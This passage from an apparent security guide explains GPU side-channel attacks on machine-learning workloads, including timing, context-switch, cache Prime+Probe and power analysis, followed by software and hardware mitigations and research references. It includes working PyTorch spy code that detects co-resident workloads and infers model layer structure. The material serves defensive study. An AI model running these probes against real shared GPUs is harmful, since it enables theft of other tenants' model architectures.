        Timing variations can reveal co-resident workload activity.
        """
        if sizes_mb is None:
            sizes_mb = [1, 10, 50, 100, 500]
 
        results = []
        for size_mb in sizes_mb:
            num_elements = (size_mb * 1024 * 1024) // 4
            timings = []
 
            for _ in range(num_samples):
                torch.cuda.synchronize()
                start = time.perf_counter_ns()
 
                try:
                    t = torch.empty(num_elements, dtype=torch.float32, device=self.device)
                    torch.cuda.synchronize()
                    elapsed_ns = time.perf_counter_ns() - start
                    timings.append(elapsed_ns)
                    del t
                    torch.cuda.empty_cache()
                except torch.cuda.OutOfMemoryError:
                    break
 
            if timings:
                results.append({
                    "size_mb": size_mb,
                    "mean_ns": sum(timings) / len(timings),
                    "min_ns": min(timings),
                    "max_ns": max(timings),
                    "std_ns": (
                        sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                    ) ** 0.5,
                    "samples": len(timings),
                })
 
        return results
 
    def measure_inference_timing(
        self,
        model: torch.nn.Module,
        input_sizes: List[Tuple[int, ...]],
        num_samples: int = 50,
    ) -> List[Dict]:
        """
        Measure inference timing across different input sizes.
        Timing reveals information about model architecture.
        """
        model.eval()
        results = []
 
        for input_size in input_sizes:
            timings = []
 
            for _ in range(num_samples):
                x = torch.randn(*input_size, device=self.device)
 
                # Warm up
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
 
                # Measure
                start = time.perf_counter_ns()
                with torch.no_grad():
                    _ = model(x)
                torch.cuda.synchronize()
                elapsed_ns = time.perf_counter_ns() - start
 
                timings.append(elapsed_ns)
                del x
 
            results.append({
                "input_size": input_size,
                "mean_us": sum(timings) / len(timings) / 1000,
                "std_us": (
                    sum((t - sum(timings)/len(timings))**2 for t in timings) / len(timings)
                ) ** 0.5 / 1000,
                "samples": len(timings),
            })
 
        return results
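
Raw timing numbers like these only become a usable side channel once two sets of samples can be told apart reliably. The sketch below shows one way to check that, using Welch's t-statistic on two lists of nanosecond timings, for example one collected on an idle GPU and one collected while a co-resident workload is suspected. The function names and the 4.5 threshold are assumptions made for illustration (the threshold is borrowed from common leakage-assessment practice); they are not taken from the cited research.

```python
import math
import statistics
from typing import Sequence


def welch_t_statistic(baseline_ns: Sequence[float], observed_ns: Sequence[float]) -> float:
    """Return Welch's t-statistic for two independent timing samples."""
    if len(baseline_ns) < 2 or len(observed_ns) < 2:
        raise ValueError("each sample needs at least two measurements")

    mean_a = statistics.fmean(baseline_ns)
    mean_b = statistics.fmean(observed_ns)
    var_a = statistics.variance(baseline_ns)  # sample variance (n - 1)
    var_b = statistics.variance(observed_ns)

    standard_error = math.sqrt(var_a / len(baseline_ns) + var_b / len(observed_ns))
    if standard_error == 0:
        # Both samples are constant: either identical or trivially separable
        if mean_a == mean_b:
            return 0.0
        return math.copysign(math.inf, mean_b - mean_a)
    return (mean_b - mean_a) / standard_error


def timings_differ(
    baseline_ns: Sequence[float],
    observed_ns: Sequence[float],
    t_threshold: float = 4.5,  # assumed cut-off, tune for your setup
) -> bool:
    """Report whether the two timing samples are distinguishable."""
    return abs(welch_t_statistic(baseline_ns, observed_ns)) > t_threshold
```

A result of `True` suggests the timing difference is unlikely to be noise alone. It does not say what caused the difference, so repeated measurements under controlled conditions are still needed.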

Context-switching side channels

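When workloads time-share a GPU, the timing variations a spy process observes around context switches can reveal:

Whether a neural network is running on the shared GPU
The model architecture (number of layers, layer types)
The properties of the input data (image dimensions, batch size)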

import torch
import time
from typing import Dict, List
 
class ContextSwitchSpy:
    """
    Monitor GPU context switching to infer co-resident workload properties.
    Based on concepts from Wei et al. (IEEE DSN 2020).
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def run_spy_kernel(
        self,
        duration_seconds: float = 5.0,
        probe_size: int = 1024,
    ) -> Dict:
        """
        Run a continuous probe kernel and measure timing variations.
        Timing spikes indicate GPU context switches to other workloads.
        """
        probe = torch.randn(probe_size, probe_size, device=self.device)
        measurements = []
        start_time = time.perf_counter()
 
        while time.perf_counter() - start_time < duration_seconds:
            torch.cuda.synchronize()
            op_start = time.perf_counter_ns()
 
            # Simple matrix multiply as timing probe
            result = torch.mm(probe, probe)
            torch.cuda.synchronize()
 
            op_end = time.perf_counter_ns()
            elapsed_ns = op_end - op_start
 
            measurements.append({
                "timestamp_ns": op_start,
                "duration_ns": elapsed_ns,
            })
 
            del result
 
        # Analyze timing variations
        if not measurements:
            return {
                "total_probes": 0,
                "measurements": [],
                "interpretation": "No probes collected; increase duration_seconds",
            }

        durations = [m["duration_ns"] for m in measurements]
        mean_duration = sum(durations) / len(durations)
        threshold = mean_duration * 2  # Heuristic: treat a >2x slowdown as a context switch

        context_switches = [
            m for m in measurements if m["duration_ns"] > threshold
        ]

        return {
            "total_probes": len(measurements),
            "mean_duration_ns": mean_duration,
            "context_switches_detected": len(context_switches),
            "switch_ratio": len(context_switches) / len(measurements),
            # Raw samples, so they can be passed to infer_layer_structure()
            "measurements": measurements,
            "interpretation": (
                "Co-resident GPU workload detected"
                if len(context_switches) > len(measurements) * 0.05
                else "No significant co-resident activity detected"
            ),
        }
 
    def infer_layer_structure(
        self,
        measurements: List[Dict],
        expected_layer_duration_us: float = 100,
    ) -> Dict:
        """
        Attempt to infer neural network layer structure from timing patterns.
        Different layer types (conv, attention, linear) have characteristic timing signatures.
        """
        # Group context switch gaps into clusters that may correspond to layers
        durations = [m["duration_ns"] for m in measurements]
        mean_d = sum(durations) / len(durations)
 
        # Find timing pattern periodicity
        anomalies = []
        for i, d in enumerate(durations):
            if d > mean_d * 1.5:
                anomalies.append(i)
 
        if len(anomalies) < 2:
            return {"inference_possible": False, "reason": "Insufficient anomaly data"}
 
        # Calculate intervals between anomalies
        intervals = [
            anomalies[i+1] - anomalies[i]
            for i in range(len(anomalies) - 1)
        ]
 
        # Look for periodicity (suggesting repeated layer execution)
        if intervals:
            mean_interval = sum(intervals) / len(intervals)
            interval_std = (
                sum((i - mean_interval)**2 for i in intervals) / len(intervals)
            ) ** 0.5
 
            periodic = interval_std / mean_interval < 0.3 if mean_interval > 0 else False
 
            return {
                "inference_possible": True,
                "anomaly_count": len(anomalies),
                "mean_interval": mean_interval,
                "periodic": periodic,
                "estimated_layers": len(anomalies) if periodic else "unknown",
                "interpretation": (
                    f"Detected periodic pattern suggesting ~{len(anomalies)} layer executions"
                    if periodic
                    else "Detected activity but could not determine layer structure"
                ),
            }
 
        return {"inference_possible": False, "reason": "No clear pattern"}
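
The interval-based check above depends on a fixed anomaly threshold. As an alternative illustration, the sketch below estimates periodicity directly from the probe durations with a plain autocorrelation, which does not need a threshold. This is a swapped-in technique for comparison, not the method of Wei et al., and `dominant_period` is a hypothetical helper name.

```python
from typing import List, Optional


def dominant_period(durations: List[float], max_lag: Optional[int] = None) -> Optional[int]:
    """
    Return the lag (in probe samples) with the highest positive
    autocorrelation, or None if the series shows no repeating structure.
    """
    n = len(durations)
    if n < 4:
        return None

    mean = sum(durations) / n
    centered = [d - mean for d in durations]
    energy = sum(c * c for c in centered)
    if energy == 0:
        return None  # perfectly flat series, nothing to correlate

    # Only lags up to half the series length have enough overlapping samples
    lag_limit = min(max_lag if max_lag is not None else n // 2, n - 1)

    best_lag: Optional[int] = None
    best_score = 0.0
    for lag in range(1, lag_limit + 1):
        overlap = sum(centered[i] * centered[i + lag] for i in range(n - lag))
        score = overlap / energy  # normalized to the range [-1, 1]
        if score > best_score:
            best_lag, best_score = lag, score
    return best_lag
```

With probe durations that spike every fifth sample, the function returns 5. Turning that lag into a layer count still requires knowing how long one probe takes relative to the victim's kernels, which this sketch does not attempt.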

Cache-based side channels

GPU cache contention

Modern GPUs have L1 and L2 caches. In shared GPU environments, cache contention between workloads creates observable timing differences:

import torch
import time
from typing import Dict, List
 
class GPUCacheSideChannel:
    """
    Demonstrate GPU cache-based side channels.
    Cache contention from co-resident workloads causes measurable timing variations.
    """
 
    def __init__(self, device: str = "cuda:0"):
        self.device = torch.device(device)
 
    def prime_and_probe(
        self,
        array_size: int = 4 * 1024 * 1024,  # 4M elements ~= 16MB at float32
        num_rounds: int = 100,
    ) -> Dict:
        """
        GPU adaptation of Prime+Probe cache side channel.
 
        1. Prime: Fill GPU cache with known data
        2. Wait: Allow victim to execute (displacing some cache lines)
        3. Probe: Measure access time to our cached data
 
        Cache lines displaced by the victim will be slower to access.
        """
        # Create a large array that fills the L2 cache
        probe_array = torch.randn(array_size, dtype=torch.float32, device=self.device)
        access_pattern = torch.randperm(array_size, device=self.device)[:1024]
 
        baseline_times = []
        probe_times = []
 
        for round_idx in range(num_rounds):
            # PRIME: Access all elements to fill cache
            torch.cuda.synchronize()
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # PROBE (baseline — no victim activity between prime and probe)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            baseline_time = time.perf_counter_ns() - start
            baseline_times.append(baseline_time)
 
            # PRIME again
            _ = probe_array.sum()
            torch.cuda.synchronize()
 
            # Small delay to allow potential co-resident activity
            time.sleep(0.001)
 
            # PROBE again (after potential victim activity)
            start = time.perf_counter_ns()
            _ = probe_array[access_pattern].sum()
            torch.cuda.synchronize()
            probe_time = time.perf_counter_ns() - start
            probe_times.append(probe_time)
 
        mean_baseline = sum(baseline_times) / len(baseline_times)
        mean_probe = sum(probe_times) / len(probe_times)
 
        return {
            "rounds": num_rounds,
            "mean_baseline_ns": mean_baseline,
            "mean_probe_ns": mean_probe,
            "timing_difference_ns": mean_probe - mean_baseline,
            "cache_contention_detected": mean_probe > mean_baseline * 1.2,
            "contention_ratio": mean_probe / mean_baseline if mean_baseline > 0 else 0,
        }
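
To make the Prime+Probe logic easier to follow without a GPU, the sketch below replays the three steps on a toy direct-mapped cache. The cache model, the class name and the address-to-set mapping are all simplifying assumptions. Real GPU caches are set-associative and their mapping is more complex, so this illustrates the principle only.

```python
from typing import Iterable, List, Optional, Set, Tuple


class ToyDirectMappedCache:
    """Toy cache model: every address maps to exactly one set (one line per set)."""

    def __init__(self, num_sets: int):
        self.num_sets = num_sets
        self.lines: List[Optional[Tuple[str, int]]] = [None] * num_sets

    def access(self, owner: str, address: int) -> bool:
        """Access an address; return True on a hit and False on a miss."""
        index = address % self.num_sets
        tag = (owner, address)
        hit = self.lines[index] == tag
        self.lines[index] = tag  # a miss evicts whatever was cached there
        return hit


def prime_and_probe(cache: ToyDirectMappedCache, victim_addresses: Iterable[int]) -> Set[int]:
    """Return the cache sets the victim touched, as seen by the attacker."""
    # PRIME: the attacker fills every set with its own data
    for set_index in range(cache.num_sets):
        cache.access("attacker", set_index)

    # WAIT: the victim runs and evicts some of the attacker's lines
    for address in victim_addresses:
        cache.access("victim", address)

    # PROBE: a miss means the victim displaced that set in the meantime
    return {
        set_index
        for set_index in range(cache.num_sets)
        if not cache.access("attacker", set_index)
    }
```

On real hardware the attacker cannot observe hits and misses directly. It infers them from access latency, which is what the timing measurements in `GPUCacheSideChannel` approximate.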

Power and electromagnetic side channels

GPU power consumption correlates with computational activity. Research has shown that power traces can reveal:

Whether the GPU is performing matrix multiplication (training/inference) or memory operations
The size of the matrices being computed
Possibly the values being processed (in extreme cases, with high-resolution measurements)

These attacks require physical access to power measurement points or electromagnetic probes near the GPU, which makes them most relevant for:

Shared physical infrastructure (colocation data centers)
Edge AI devices to which an attacker has physical access
Supply chain attacks in which monitoring hardware has been implanted

from typing import Dict, List, Optional
from dataclasses import dataclass
 
@dataclass
class PowerMeasurement:
    """Simulated GPU power measurement data point."""
    timestamp_us: float
    power_watts: float
    gpu_utilization_pct: float
 
class PowerSideChannelAnalyzer:
    """
    Analyze GPU power consumption traces for information leakage.
 
    In practice, power measurements come from:
    - nvidia-smi (low resolution, ~1 second)
    - NVML API (higher resolution, ~100ms)
    - External power meters (highest resolution)
    """
 
    def analyze_power_trace(
        self,
        measurements: List[PowerMeasurement],
    ) -> Dict:
        """Analyze a power consumption trace for patterns."""
        if not measurements:
            return {"analysis": "no_data"}
 
        powers = [m.power_watts for m in measurements]
        timestamps = [m.timestamp_us for m in measurements]
 
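        # Detect computation phases, using the same threshold for every sample
        mean_power = sum(powers) / len(powers)
        idle_threshold = mean_power * 0.8
        phases = []
        current_phase = "idle" if powers[0] < idle_threshold else "active"
        phase_start = 0

        for i in range(1, len(powers)):
            new_phase = "idle" if powers[i] < idle_threshold else "active"
            if new_phase != current_phase:
                phases.append({
                    "type": current_phase,
                    "start_idx": phase_start,
                    "end_idx": i,
                    "duration_us": timestamps[i] - timestamps[phase_start],
                    "mean_power": sum(powers[phase_start:i]) / (i - phase_start),
                })
                current_phase = new_phase
                phase_start = i

        # Close the final phase, which the loop above never appends
        phases.append({
            "type": current_phase,
            "start_idx": phase_start,
            "end_idx": len(powers),
            "duration_us": timestamps[-1] - timestamps[phase_start],
            "mean_power": sum(powers[phase_start:]) / (len(powers) - phase_start),
        })

        active_phases = [p for p in phases if p["type"] == "active"]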
 
        return {
            "total_measurements": len(measurements),
            "mean_power_watts": mean_power,
            "max_power_watts": max(powers),
            "min_power_watts": min(powers),
            "computation_phases": len(active_phases),
            "phase_details": active_phases[:10],
            "interpretation": (
                f"Detected {len(active_phases)} computation phases — "
                "may correspond to model layers or inference batches"
            ),
        }
 
    def detect_model_architecture_from_power(
        self, phases: List[Dict]
    ) -> Dict:
        """
        Attempt to infer model architecture from power consumption patterns.
        Different layer types have characteristic power signatures.
        """
        if len(phases) < 3:
            return {"inference_possible": False}
 
        # Attention layers: high power, longer duration
        # Linear layers: moderate power, shorter duration
        # Normalization: low power, very short duration
        layer_classifications = []
        for phase in phases:
            power = phase.get("mean_power", 0)
            duration = phase.get("duration_us", 0)
 
            if power > 250 and duration > 1000:
                layer_classifications.append("attention_or_matmul")
            elif power > 150 and duration > 500:
                layer_classifications.append("linear")
            elif duration < 200:
                layer_classifications.append("normalization_or_activation")
            else:
                layer_classifications.append("unknown")
 
        return {
            "inference_possible": True,
            "estimated_layers": len(layer_classifications),
            "layer_types": layer_classifications,
            "attention_layers": layer_classifications.count("attention_or_matmul"),
            "linear_layers": layer_classifications.count("linear"),
        }

Mitigations

Software mitigations

import time
import torch
from typing import Optional
 
class GPUSideChannelMitigation:
    """Software mitigations for GPU side-channel attacks."""
 
    @staticmethod
    def secure_allocate(
        size: tuple,
        dtype: torch.dtype = torch.float32,
        device: str = "cuda:0",
    ) -> torch.Tensor:
        """Allocate GPU memory and zero-initialize it to prevent residual data leakage."""
        tensor = torch.zeros(size, dtype=dtype, device=torch.device(device))
        return tensor
 
    @staticmethod
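    def secure_deallocate(tensor: torch.Tensor) -> None:
        """
        Overwrite a tensor with zeros before freeing it.
        Note: `del` below only drops this function's reference. The caller must
        drop its own references too before the memory can be released.
        """
        if tensor.is_cuda:
            tensor.zero_()
            torch.cuda.synchronize()
        del tensor
        torch.cuda.empty_cache()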
 
    @staticmethod
    def add_timing_noise(
        min_delay_ms: float = 0.1,
        max_delay_ms: float = 1.0,
    ) -> None:
        """
        Add random timing noise to inference operations.
        Makes timing side channels less reliable.
        """
        import random
        delay = random.uniform(min_delay_ms, max_delay_ms) / 1000
        time.sleep(delay)
 
    @staticmethod
    def constant_time_inference(
        model: torch.nn.Module,
        input_tensor: torch.Tensor,
        fixed_duration_ms: float = 100,
    ) -> torch.Tensor:
        """
        Execute inference and pad to a fixed duration.
        Hides end-to-end latency differences from callers as long as inference
        finishes within fixed_duration_ms; slower runs are returned unpadded.
        """
        start = time.perf_counter()
 
        with torch.no_grad():
            output = model(input_tensor)
        torch.cuda.synchronize()
 
        elapsed_ms = (time.perf_counter() - start) * 1000
        remaining_ms = fixed_duration_ms - elapsed_ms
        if remaining_ms > 0:
            time.sleep(remaining_ms / 1000)
 
        return output
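
Padding to one fixed duration stops working as soon as a request takes longer than that duration. One possible refinement, sketched below, rounds every latency up to the next multiple of a bucket size, so slow requests are padded as well. `padded_duration_ms`, `run_with_bucketed_latency` and the 50 ms default are hypothetical names and values chosen for illustration.

```python
import math
import time
from typing import Callable, TypeVar

T = TypeVar("T")


def padded_duration_ms(elapsed_ms: float, bucket_ms: float = 50.0) -> float:
    """Round a latency up to the next multiple of bucket_ms (at least one bucket)."""
    if bucket_ms <= 0:
        raise ValueError("bucket_ms must be positive")
    buckets = max(1, math.ceil(elapsed_ms / bucket_ms))
    return buckets * bucket_ms


def run_with_bucketed_latency(fn: Callable[[], T], bucket_ms: float = 50.0) -> T:
    """
    Run fn() and sleep until the next bucket boundary before returning.
    For GPU work, fn should synchronize the device before it returns,
    otherwise the measured time covers only the kernel launch.
    """
    start = time.perf_counter()
    result = fn()
    elapsed_ms = (time.perf_counter() - start) * 1000

    remaining_ms = padded_duration_ms(elapsed_ms, bucket_ms) - elapsed_ms
    if remaining_ms > 0:
        time.sleep(remaining_ms / 1000)
    return result
```

Callers then only learn which bucket a request fell into, not its exact duration. Larger buckets leak less but add more latency, and the padding affects only what a remote caller observes.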

Hardware mitigations

Mitigation	Effectiveness	Performance impact	Availability
MIG (Multi-Instance GPU)	High (hardware isolation)	Reduces compute per instance	A100, H100
NVIDIA Confidential Computing	Very high (encrypted GPU memory)	5-15% overhead	H100
GPU memory scrubbing	Medium (removes residual data)	Adds allocation latency	Configurable in software
Dedicated GPU per workload	Complete (no sharing)	Expensive (hardware cost)	Any GPU
IOMMU	Medium (prevents DMA attacks)	Minimal	Depends on CPU/chipset

Defensive recommendations

Use MIG in multi-tenant GPU environments to get hardware-enforced memory isolation
Zero-initialize GPU memory on allocation to prevent residual data leakage
Overwrite GPU memory with zeros before freeing sensitive tensors
Use NVIDIA Confidential Computing (H100) for sensitive inference workloads
Avoid GPU time-slicing for security-sensitive workloads; use dedicated GPUs or MIG instances instead
Add timing noise to inference operations to make timing side channels less reliable
Monitor GPU power consumption for anomalous patterns that may indicate a side-channel attack
Enable the IOMMU to prevent DMA-based memory access from compromised GPU workloads

References

Naghibijouybari et al. — "Rendered Insecure: GPU Side Channel Attacks are Practical" (IEEE S&P 2018) — foundational GPU side channel research
Wei et al. — "Leaky DNN: Stealing Deep-learning Model Secret with GPU Context-Switching Side-Channel" (IEEE DSN 2020) — model architecture inference from context switching
Zhu et al. — "Hermes Attack: Steal DNN Models with Lossless Inference Accuracy" (USENIX Security 2021) — model extraction via GPU side channels
NVIDIA Multi-Instance GPU — https://docs.nvidia.com/datacenter/tesla/mig-user-guide/
NVIDIA Confidential Computing — https://developer.nvidia.com/confidential-computing
MITRE ATLAS — AML.T0024 (Exfiltration via ML Inference API)
